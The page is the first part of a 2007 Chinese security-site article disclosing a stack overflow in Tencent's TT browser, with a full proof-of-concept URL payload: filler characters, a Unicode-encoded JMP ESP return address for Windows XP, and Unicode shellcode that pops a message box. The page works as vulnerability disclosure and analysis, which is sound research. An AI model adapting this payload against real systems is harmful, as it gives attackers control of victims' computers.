首页  |  系统优化  |  推荐教程  |  常用工具  |  系统工具  |  电脑常识  |  软件技巧  |  攻防天地  |  认证考试  |  故障解决  |  电脑维护  |  站内新闻公告
您的位置:学习中国 攻防天地 黑客技术 正文
热门文章
破解加密的qq相册
DOS入侵命令全集
破解常用电脑密码实用技
通过U盘绕过密码登录Win
黑客入侵具体环节
如何在Windows 2003中得
局域网监听的基本原理
借用管理员的登录方式渗
看看黑客如何破解MS SQL
四大漏洞入侵博客
详细解说IPC$问题
QQ Traveler漏洞分析与利
黑客案例——浏览器执行
搜索型注入之我看
一种新的穿透防火墙的数
推荐文章
看看黑客如何破解MS SQL
一种新的穿透防火墙的数
vbs实现sql注入
如何在Windows 2003中得
QQ Traveler漏洞分析与利
黑客入侵具体环节
单引号进后台全集
安全之大流量网站DNS解析
利用格式化字符串漏洞对
黑客案例——浏览器执行
搜索型注入之我看
借用管理员的登录方式渗
四大漏洞入侵博客
DOS入侵命令全集
详细解说IPC$问题
最新文章
通过U盘绕过密码登录Win
破解加密的qq相册
破解常用电脑密码实用技
局域网监听的基本原理
详细解说IPC$问题
DOS入侵命令全集
四大漏洞入侵博客
借用管理员的登录方式渗
搜索型注入之我看
黑客案例——浏览器执行
利用格式化字符串漏洞对
安全之大流量网站DNS解析
单引号进后台全集
黑客入侵具体环节
QQ Traveler漏洞分析与利
QQ Traveler漏洞分析与利用(0day)
原作者:admin 添加时间:2007-05-19 原文发表:2007-05-19 人气:65
本文章共3772字,分3页,当前第1页,快速翻页:
 

failwest shineast

漏洞概述
腾讯TT(QQ Traveler)是一款多页面浏览器,具有亲切、友好的用户界面,提供多种皮肤供用户根据个人喜好使用,另外TT更是新增了多项人性化的特色功能,使上网冲浪变的更加轻松自如、省时省力。智能屏蔽一键开通, 最近浏览一键找回,多页面一键打开,浏览记录一键清除,多种皮肤随心变换,多线程高速旋风下载。
腾讯TT在处理地址栏输入的URL时,存在栈溢出漏洞。虽然其处理过程中对URL进行了Unicode编码,但是经过精心的构造,还是可以构造出可见的 Unicode字符串,来控制EIP指令寄存器,并构造支持Unicode的shellcode。这一点已经得到我们的证实!
漏洞分析
构造的URL如下:
http://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeefffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffggggggggggggggggggggggggggg ... hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh蠀緑橨㠊栞襣俑㉨酴謌跴�ҷ뭦㈳桓獵牥㍔擒媋謰ో䦋謜謉ࡩ㶭੪Ḹյユ悕䖋謼Ռ͸词⁙�S譇무ྙھ쐺ࡴ쫁̇䛐吻ᰤ妋̤曝㲋譻᱙�Ⰳ閻ꭟ慗樽㠊甞㎩叛睨獥桴慦汩쒋偓卐埿叼埿
――――――――――――――――――――――――――――――――
其中蠀緑是7DD1 8800这个十六进制的unicode码,这个地址指向Window XP的shell32.dll中的某个JMP ESP指令的地址;
剩下的蓝色部分是一段支持unicode的shellcode,这段shellcode是failwest大侠所作,可以自动加载user32.dll动态链接库,并弹出对话框,显示“failwest”。
因此,如果把上面的url填入腾讯TT的地址栏,并执行了shellcode,即弹出了对话框,那么就可以说明这个漏洞的存在
 
本文章更多内容1 - 2 - 3 - 下一页>>
本页地址
相关文章
如何在Windows 2003中得到登陆密码
vbs实现sql注入
一种新的穿透防火墙的数据传输技术
看看黑客如何破解MS SQL SERCVER密码
黑客入侵具体环节
单引号进后台全集
安全之大流量网站DNS解析缘何被修改
利用格式化字符串漏洞对系统发起攻击
黑客案例——浏览器执行exe文件的探讨
搜索型注入之我看
借用管理员的登录方式渗透
四大漏洞入侵博客
DOS入侵命令全集
详细解说IPC$问题

相关评论

本文章所属分类:首页 攻防天地 黑客技术   黑客技术
文章搜索


 
返回网站首页